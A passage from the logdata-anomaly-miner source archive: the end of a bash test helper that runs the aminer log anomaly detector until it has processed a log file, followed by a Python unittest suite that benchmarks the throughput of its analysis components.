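  LEN=$(( LEN1 < LEN2 ? LEN1 : LEN2 )) # minimum length
  for ((i=0; i < LEN; i++)); do
    if [[ "${V1[i]}" -lt "${V2[i]}" ]]; then
      return 2
    elif [[ "${V1[i]}" -gt "${V2[i]}" ]]; then
      return 1
    fi
  done
  return 0
}

# runAminerUntilEnd CMD LOGFILE REP_PATH CFG_PATH [OUT] [KEEP]
#   Appends "Core.PersistencePeriod = 1" to CFG_PATH (.py or .yml syntax),
#   removes REP_PATH, starts CMD in the background (stdout redirected to OUT
#   when given) and then polls REP_PATH until the size recorded in its second
#   comma-separated field equals the size of LOGFILE, giving up after 20
#   one-second rounds. The appended config line is removed again afterwards.
#   Without a 6th argument the aminer processes are killed and the exit
#   status of the background job is returned; with one the job is left
#   running and its PID is returned (see the note at the end).
#   Returns 2 when CFG_PATH is neither a .py nor a .yml file.
function runAminerUntilEnd() {
  CMD=$1
  LOGFILE=$2
  REP_PATH=$3
  CFG_PATH=$4
  if [[ $CFG_PATH == *.py ]]; then
    echo "config_properties['Core.PersistencePeriod'] = 1" | sudo tee -a "$CFG_PATH" > /dev/null
  elif [[ $CFG_PATH == *.yml ]]; then
    echo "Core.PersistencePeriod: 1" | sudo tee -a "$CFG_PATH" > /dev/null
  else
    return 2
  fi
  sudo rm "$REP_PATH" 2> /dev/null
  # $CMD is deliberately left unquoted: it is a whole command line and must
  # be word-split into program and arguments.
  if [ $# -ge 5 ]; then
    OUT=$5
    $CMD > "$OUT" &
  elif [ $# -eq 4 ]; then
    $CMD &
  fi
  PID=$!
  FILE_SIZE=$(stat --printf="%s" "$LOGFILE" 2> /dev/null)
  # The second field of the repository file is compared with the log file's
  # size (presumably the number of bytes aminer has consumed so far).
  IN=$(cat "$REP_PATH" 2> /dev/null)
  IFS=',' read -ra ADDR <<< "$IN"
  CURRENT_SIZE=$(echo ${ADDR[1]} | sed 's/ *$//g') # trim all whitespaces
  CNTR=0
  while [[ ("$CURRENT_SIZE" != "$FILE_SIZE" || "$CURRENT_SIZE" == "") && $CNTR -lt 20 ]]; do
    sleep 1
    IN=$(cat "$REP_PATH" 2> /dev/null)
    IFS=',' read -ra ADDR <<< "$IN"
    CURRENT_SIZE=$(echo ${ADDR[1]} | sed 's/ *$//g') # trim all whitespaces
    CNTR=$((CNTR + 1))
  done
  sleep 3
  # Delete the PersistencePeriod line appended above. This assumes the config
  # file ended with a newline, so that the appended line is the last one.
  sudo sed -i '$d' "$CFG_PATH"
  if [ $# -lt 6 ]; then
    # Kills every process named aminer on the host, not only the one started
    # here; $PID may belong to a sudo wrapper rather than to aminer itself,
    # which is presumably why matching by name is used.
    sudo pkill -x aminer
    wait "$PID"
    RES=$?
    return $RES
  fi
  # NOTE: a return status is truncated to 8 bits, so a PID above 255 cannot
  # be recovered from $? here; callers needing the PID should read $PID.
  return $PID
}
logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/000077500000000000000000000000001437606560100217645ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/AnalysisComponentsPerformanceTest.py000066400000000000000000002503201437606560100312130ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.analysis.MatchValueAverageChangeDetector import MatchValueAverageChangeDetector from aminer.analysis.MatchValueStreamWriter import MatchValueStreamWriter from aminer.analysis.MissingMatchPathValueDetector import MissingMatchPathListValueDetector from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.analysis.NewMatchPathValueDetector import NewMatchPathValueDetector from aminer.analysis.TimeCorrelationDetector import TimeCorrelationDetector from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector from aminer.analysis.AtomFilters import MatchPathFilter, SubhandlerFilter, MatchValueFilter from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector from aminer.analysis.EventSequenceDetector import EventSequenceDetector from aminer.analysis.HistogramAnalysis import ModuloTimeBinDefinition, HistogramData, HistogramAnalysis from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust from aminer.analysis.Rules import PathExistsMatchRule from aminer.analysis.EnhancedNewMatchPathValueComboDetector import EnhancedNewMatchPathValueComboDetector from 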
aminer.analysis.NewMatchIdValueComboDetector import NewMatchIdValueComboDetector from aminer.analysis.ParserCount import ParserCount from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector from aminer.analysis.MatchFilter import MatchFilter from aminer.analysis.VariableTypeDetector import VariableTypeDetector from aminer.analysis.VariableCorrelationDetector import VariableCorrelationDetector from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from unit.TestBase import TestBase import time import random from time import process_time from _io import StringIO import timeit import pickle # skipcq: BAN-B403 class AnalysisComponentsPerformanceTest(TestBase): """These unittests test the performance of all analysis components.""" result_string = 'The %s could in average handle %d LogAtoms %s with %s\n' result = '' iterations = 2 waiting_time = 1 integerd = 'integer/d' different_paths = '%d different path(es).' different_attributes = '%d different attribute(s).' 
@classmethod
def tearDownClass(cls) -> None:
    """Run the TestBase tearDownClass method and print the results."""
    super(AnalysisComponentsPerformanceTest, cls).tearDownClass()
    # cls.result is the class-level string every run_* method appends its
    # summary line to; it is only printed once, after all tests ran.
    print('\nwaiting time: %d seconds' % cls.waiting_time)
    print(cls.result)

def setUp(self) -> None:
    """Set up needed variables."""
    TestBase.setUp(self)
    # Event output is collected in memory so the benchmarks do not touch a file.
    self.output_stream = StringIO()
    self.stream_printer_event_handler = StreamPrinterEventHandler(self.analysis_context, self.output_stream)

def run_atom_filters_match_path_filter(self, number_of_paths: int) -> None:
    """Run the performance tests for AtomFilters.MatchPathFilter."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True)
        subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True)
        # One MatchPathFilter per path, chained so the first matching filter stops the dispatch.
        i = 0
        while i < number_of_paths:
            match_path_filter = MatchPathFilter([(self.integerd + str(i), new_match_path_detector)], None)
            subhandler_filter.add_handler(match_path_filter, stop_when_handled_flag=True)
            i = i + 1
        t = round(time.time(), 3)
        # worst case: the atom's path matches none of the registered filters, so all of them are visited.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(123456789).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter)
        # Atoms per waiting_time, derived from the mean duration of 10000 receive_atom calls.
        worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
        # best case: the atom's path matches the first filter.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(123456789).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_path_filter)
        best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
        results[z] = int((worst_case + best_case) / 2)
        z = z + 1
        avg = avg + (worst_case + best_case) / 2
    avg = int(avg / self.iterations)
    # Append the summary line to the class-level result printed by tearDownClass.
    type(self).result = self.result + self.result_string % (subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a %s.' % (number_of_paths, match_path_filter.__class__.__name__, new_match_path_detector.__class__.__name__))

def run_atom_filters_match_value_filter(self, number_of_paths: int) -> None:
    """Run the performance tests for AtomFilters.MatchValueFilter."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True)
        subhandler_filter = SubhandlerFilter([], stop_when_handled_flag=True)
        # A large value -> handler dictionary (one million entries) shared by every MatchValueFilter.
        i = 0
        dictionary = {}
        while i < 1000000:
            dictionary[i] = new_match_path_detector
            i = i + 1
        i = 0
        while i < number_of_paths:
            match_value_filter = MatchValueFilter(self.integerd + str(i % number_of_paths), dictionary, None)
            subhandler_filter.add_handler(match_value_filter, stop_when_handled_flag=True)
            i = i + 1
        t = round(time.time(), 3)
        # worst case: the atom's path matches none of the registered filters.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(123456789).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter)
        worst_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
        # best case: the atom's path matches the first filter.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(123456789).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, match_value_filter)
        best_case = self.waiting_time / (timeit.timeit(lambda: subhandler_filter.receive_atom(log_atom), number=10000) / 10000)
        results[z] = int((worst_case + best_case) / 2)
        z = z + 1
        avg = avg + (worst_case + best_case) / 2
    avg = int(avg / self.iterations)
    type(self).result = self.result + self.result_string % (subhandler_filter.__class__.__name__, avg, results, '%d different %ss with a dictionary of %ss.' % (number_of_paths, match_value_filter.__class__.__name__, new_match_path_detector.__class__.__name__))

def run_new_match_path_detector(self, number_of_paths: int) -> None:
    """Run the performance tests for NewMatchPathDetector."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], 'Default', True)
        t = round(time.time(), 3)
        measured_time = 0
        i = 0
        # Feed atoms, cycling through number_of_paths distinct paths, until a tenth of waiting_time
        # has been spent inside receive_atom; the count is then scaled up by 10.
        while measured_time < self.waiting_time / 10:
            decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(i).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_detector)
            measured_time += timeit.timeit(lambda: new_match_path_detector.receive_atom(log_atom), number=1)
            i += 1
        results[z] = i * 10
        z = z + 1
        avg = avg + i * 10
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (new_match_path_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths)

def run_enhanced_new_match_path_value_combo_detector(self, number_of_paths: int) -> None:
    """Run the performance tests for EnhancedNewMatchPathValueComboDetector."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        i = 0
        path_list = []
        while i < number_of_paths:
            path_list.append(self.integerd + str(i % number_of_paths))
            i = i + 1
        enhanced_new_match_path_value_combo_detector = EnhancedNewMatchPathValueComboDetector(self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True)
        t = round(time.time(), 3)
        # worst case: the atom's path is not in path_list.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(123456789).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector)
        worst_case = self.waiting_time / (timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000)
        # best case: the atom's path is the first entry of path_list.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(123456789).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, enhanced_new_match_path_value_combo_detector)
        best_case = self.waiting_time / (timeit.timeit(lambda: enhanced_new_match_path_value_combo_detector.receive_atom(log_atom), number=10000) / 10000)
        results[z] = int((worst_case + best_case) / 2)
        z = z + 1
        avg = avg + (worst_case + best_case) / 2
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (enhanced_new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths)

def run_histogram_analysis(self, number_of_paths: int, amplifier) -> None:
    """Run the performance tests for HistogramAnalysis."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        # number_of_paths bins over one day (86400 s); a report is emitted every
        # amplifier * waiting_time elements.
        modulo_time_bin_definition = ModuloTimeBinDefinition(86400, 86400 / number_of_paths, 0, 1, number_of_paths, False)
        histogram_data = HistogramData('match/crontab', modulo_time_bin_definition)
        histogram_analysis = HistogramAnalysis(self.aminer_config, [(histogram_data.property_path, modulo_time_bin_definition)], amplifier * self.waiting_time, [self.stream_printer_event_handler], False, 'Default')
        i = 0
        measured_time = 0
        t = time.time()
        # Atoms carry a random timestamp offset so they spread over the bins.
        while measured_time < self.waiting_time / 10:
            rand = random.randint(0, 100000)
            match_element = MatchElement('match/crontab', str(t + rand).encode(), t + rand, None)
            log_atom = LogAtom(histogram_data.bin_data, ParserMatch(match_element), t + i, histogram_analysis)
            measured_time += timeit.timeit(lambda: histogram_analysis.receive_atom(log_atom), number=1)
            i = i + 1
        results[z] = i * 10
        z = z + 1
        avg = avg + i * 10
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (histogram_analysis.__class__.__name__, avg, results, '%d bin(s) and output after %d elements.' % (number_of_paths, amplifier * self.waiting_time))

def run_match_value_average_change_detector(self, number_of_paths: int) -> None:
    """Run the performance tests for MatchValueAverageChangeDetector."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        i = 0
        path_list = []
        while i < number_of_paths:
            path_list.append(self.integerd + str(i % number_of_paths))
            i = i + 1
        t = time.time()
        match_value_average_change_detector = MatchValueAverageChangeDetector(self.aminer_config, [self.stream_printer_event_handler], None, path_list, 2, t, False, 'Default')
        # Warm-up: four atoms per path (at t, t+0.1, t+0.2 and t+10) before timing starts.
        i = 0
        while i < number_of_paths:
            match_element = MatchElement(self.integerd + str(i), b'%d' % t, t, None)
            log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector)
            match_value_average_change_detector.receive_atom(log_atom)
            match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.1), t + 0.1, None)
            log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t + 0.1, match_value_average_change_detector)
            match_value_average_change_detector.receive_atom(log_atom)
            match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 0.2), t + 0.2, None)
            log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t + 0.2, match_value_average_change_detector)
            match_value_average_change_detector.receive_atom(log_atom)
            match_element = MatchElement(self.integerd + str(i), b'%d' % (t + 10), t + 10, None)
            log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t + 10, match_value_average_change_detector)
            match_value_average_change_detector.receive_atom(log_atom)
            i = i + 1
        t = time.time()
        # worst case: the last path of path_list.
        match_element = MatchElement(self.integerd + str(number_of_paths - 1), b'%d' % t, t, None)
        log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector)
        worst_case = self.waiting_time / (timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000)
        # best case: the first path of path_list.
        match_element = MatchElement(self.integerd + str(0), b'%d' % t, t, None)
        log_atom = LogAtom(match_element.get_match_object(), ParserMatch(match_element), t, match_value_average_change_detector)
        best_case = self.waiting_time / (timeit.timeit(lambda: match_value_average_change_detector.receive_atom(log_atom), number=10000) / 10000)
        results[z] = int((worst_case + best_case) / 2)
        z = z + 1
        avg = avg + (worst_case + best_case) / 2
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (match_value_average_change_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths)

def run_match_value_stream_writer(self, number_of_paths: int) -> None:
    """Run the performance tests for MatchValueStreamWriter."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        i = 0
        path_list = []
        parsing_model = []
        # Each round adds a decimal element plus a fixed ' Euro ' separator, so the
        # sequence model ends up with about number_of_paths elements.
        while i < number_of_paths / 2:
            path_list.append('match/integer/d' + str(i % number_of_paths))
            path_list.append('match/integer/s' + str(i % number_of_paths))
            parsing_model.append(DecimalIntegerValueModelElement('d' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE))
            parsing_model.append(FixedDataModelElement('s' + str(i % number_of_paths), b' Euro '))
            i = i + 1
        sequence_model_element = SequenceModelElement('integer', parsing_model)
        match_value_stream_writer = MatchValueStreamWriter(self.output_stream, path_list, b';', b'-')
        t = time.time()
        # Build one input line with one "<j> Euro " pair per decimal element (number_of_paths / 2 rounded up).
        data = b''
        for j in range(1, int(number_of_paths / 2) + number_of_paths % 2 + 1):
            data = data + str(j).encode() + b' Euro '
        match_context = MatchContext(data)
        match_element = sequence_model_element.get_match_element('match', match_context)
        log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, match_value_stream_writer)
        results[z] = int(self.waiting_time / (timeit.timeit(lambda: match_value_stream_writer.receive_atom(log_atom), number=10000) / 10000))
        z = z + 1
        avg = avg + results[z - 1]
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (match_value_stream_writer.__class__.__name__, avg, results, self.different_paths % number_of_paths)

def run_missing_match_path_value_detector(self, number_of_paths: int) -> None:
    """Run the performance tests for MissingMatchPathValueDetector."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        i = 0
        path_list = []
        while i < number_of_paths:
            path_list.append(self.integerd + str(i % number_of_paths))
            i = i + 1
        missing_match_path_list_value_detector = MissingMatchPathListValueDetector(self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, 3600, 86400)
        t = time.time()
        # worst case: the last path of path_list.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(number_of_paths - 1), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(1).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector)
        worst_case = self.waiting_time / (timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000)
        # best case: the first path of path_list.
        decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(0), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
        match_context = MatchContext(str(1).encode())
        match_element = decimal_integer_value_me.get_match_element('integer', match_context)
        log_atom = LogAtom(match_element.match_object, ParserMatch(match_element), t, missing_match_path_list_value_detector)
        best_case = self.waiting_time / (timeit.timeit(lambda: missing_match_path_list_value_detector.receive_atom(log_atom), number=10000) / 10000)
        # Unlike the sibling methods this one keeps the float average.
        results[z] = (worst_case + best_case) / 2
        z = z + 1
        avg = avg + (worst_case + best_case) / 2
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (missing_match_path_list_value_detector.__class__.__name__, avg, results, self.different_paths % number_of_paths)

def run_new_match_path_value_combo_detector(self, number_of_paths: int) -> None:
    """Run the performance tests for NewMatchPathValueComboDetector."""
    results = [None] * self.iterations
    avg = 0
    z = 0
    while z < self.iterations:
        i = 0
        path_list = []
        while i < number_of_paths:
            path_list.append(self.integerd + str(i % number_of_paths))
            i = i + 1
        new_match_path_value_combo_detector = NewMatchPathValueComboDetector(self.aminer_config, path_list, [self.stream_printer_event_handler], 'Default', True, True)
        t = time.time()
        measured_time = 0
        i = 0
        # Cycle through the paths with 100 distinct values until a tenth of waiting_time
        # has been spent inside receive_atom; the count is then scaled up by 10.
        while measured_time < self.waiting_time / 10:
            decimal_integer_value_me = DecimalIntegerValueModelElement('d' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE)
            match_context = MatchContext(str(i % 100).encode())
            match_element = decimal_integer_value_me.get_match_element('integer', match_context)
            log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_combo_detector)
            measured_time += timeit.timeit(lambda: new_match_path_value_combo_detector.receive_atom(log_atom), number=1)
            i = i + 1
        results[z] = i * 10
        z = z + 1
        avg = avg + i * 10
    avg = avg / self.iterations
    type(self).result = self.result + self.result_string % (new_match_path_value_combo_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths)

def run_new_match_path_value_detector(self, number_of_paths): """Run the performance tests for NewMatchValueDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: i = 0 path_list = [] while i < number_of_paths: path_list.append(self.integerd + str(i % number_of_paths)) i = i + 1 
new_match_path_value_detector = NewMatchPathValueDetector(self.aminer_config, path_list, [ self.stream_printer_event_handler], 'Default', True, True) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, new_match_path_value_detector) measured_time += timeit.timeit(lambda: new_match_path_value_detector.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( new_match_path_value_detector.__class__.__name__, avg, results, self.different_attributes % number_of_paths) def run_time_correlation_detector(self, number_of_rules): """Run the performance tests for TimeCorrelationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: time_correlation_detector = TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], number_of_rules, 'Default', self.waiting_time * 9000, True, True, True, 1, 5) t = time.time() measured_time = 0 i = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i % 100).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), t, time_correlation_detector) measured_time += timeit.timeit(lambda: time_correlation_detector.receive_atom(log_atom), number=1) i = i 
+ 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_detector.__class__.__name__, avg, results, 'test_count=%d.' % number_of_rules) def run_time_correlation_violation_detector(self, chance): """Run the performance tests for TimeCorrelationViolationDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: correlation_rule = CorrelationRule('Correlation', 0, chance, artefact_match_parameters=[('/integer/d0', '/integer/d1')]) a_class_selector = EventClassSelector('Selector1', [correlation_rule], None) b_class_selector = EventClassSelector('Selector2', None, [correlation_rule]) rules = [Rules.PathExistsMatchRule('/integer/d0', a_class_selector), Rules.PathExistsMatchRule('/integer/d1', b_class_selector)] time_correlation_violation_detector = TimeCorrelationViolationDetector( self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) s = time.time() measured_time = 0 i = 0 decimal_integer_value_me = DecimalIntegerValueModelElement( 'd0', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) while measured_time < self.waiting_time / 10: integer = '/integer' r = random.randint(1, 100) decimal_integer_value_me1 = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me1.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, 
ParserMatch(match_element), s + r / 100, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) s = s + r / 100 if r / 100 >= chance: match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element(integer, match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s, time_correlation_violation_detector) measured_time += timeit.timeit(lambda: time_correlation_violation_detector.receive_atom(log_atom), number=1) i = i + 1 time_correlation_violation_detector.do_timer(s) i = i + 2 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( time_correlation_violation_detector.__class__.__name__, avg, results, '%d%% chance of not finding an element' % ((1 - chance) * 100)) def run_timestamp_correction_filters(self, number_of_paths): """Run the performance tests for TimestampCorrectionFilters.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: new_match_path_detector = NewMatchPathDetector(self.aminer_config, [ self.stream_printer_event_handler], 'Default', True) simple_monotonic_timestamp_adjust = SimpleMonotonicTimestampAdjust([new_match_path_detector]) seconds = time.time() i = 0 measured_time = 0 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd' + str(i % number_of_paths), DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) p = process_time() r = random.randint(1, 1000000) seconds = seconds + process_time() - p match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), seconds - r, simple_monotonic_timestamp_adjust) measured_time += timeit.timeit(lambda: 
simple_monotonic_timestamp_adjust.receive_atom(log_atom), number=1) i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( simple_monotonic_timestamp_adjust.__class__.__name__, avg, results, 'a %s and %d different path(es).' % (new_match_path_detector.__class__.__name__, number_of_paths)) def run_timestamps_unsorted_detector(self, reset_factor): """Run the performance tests for TimestampsUnsortedDetector.""" results = [None] * self.iterations avg = 0 z = 0 while z < self.iterations: timestamps_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [ self.stream_printer_event_handler]) s = time.time() i = 0 measured_time = 0 mini = 100 while measured_time < self.waiting_time / 10: decimal_integer_value_me = DecimalIntegerValueModelElement( 'd', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) r = random.randint(1, 100) match_context = MatchContext(str(i).encode()) match_element = decimal_integer_value_me.get_match_element('integer', match_context) log_atom = LogAtom(match_element.match_string, ParserMatch(match_element), s + min(r, mini), timestamps_unsorted_detector) measured_time += timeit.timeit(lambda: timestamps_unsorted_detector.receive_atom(log_atom), number=1) if mini > r: mini = r else: mini = mini + reset_factor i = i + 1 results[z] = i * 10 z = z + 1 avg = avg + i * 10 avg = avg / self.iterations type(self).result = self.result + self.result_string % ( timestamps_unsorted_detector.__class__.__name__, avg, results, 'a reset_factor of %f.' 
